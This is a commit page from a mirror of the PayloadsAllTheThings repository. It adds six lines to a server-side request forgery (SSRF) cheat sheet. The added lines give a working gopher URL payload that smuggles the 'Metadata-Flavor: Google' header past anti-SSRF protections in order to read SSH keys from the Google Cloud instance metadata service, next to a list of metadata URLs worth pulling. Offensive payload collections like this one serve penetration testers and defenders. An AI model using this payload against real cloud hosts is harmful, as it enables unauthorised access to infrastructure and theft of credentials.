ch0ic3/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2025-01-18 17:28:49 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

Merge pull request #142 from mikesiegel/mike_ssrf

Browse Source 
Added anti-SSRF header bypass for GCP
This commit is contained in:
Swissky 2020-01-01 12:44:41 +01:00 committed by GitHub
commit 0850839b25
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 6 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

6
Server Side Request Forgery/README.md
View File

@ -501,6 +501,12 @@ http://metadata.google.internal/computeMetadata/v1beta1/
http://metadata.google.internal/computeMetadata/v1beta1/?recursive=true http://metadata.google.internal/computeMetadata/v1beta1/?recursive=true
``` ```
Required headers can be set using a gopher SSRF with the following technique
```powershell
gopher://metadata.google.internal:80/xGET%20/computeMetadata/v1/instance/attributes/ssh-keys%20HTTP%2f%31%2e%31%0AHost:%20metadata.google.internal%0AAccept:%20%2a%2f%2a%0aMetadata-Flavor:%20Google%0d%0a
```
Interesting files to pull out: Interesting files to pull out:
- SSH Public Key : `http://metadata.google.internal/computeMetadata/v1beta1/project/attributes/ssh-keys?alt=json` - SSH Public Key : `http://metadata.google.internal/computeMetadata/v1beta1/project/attributes/ssh-keys?alt=json`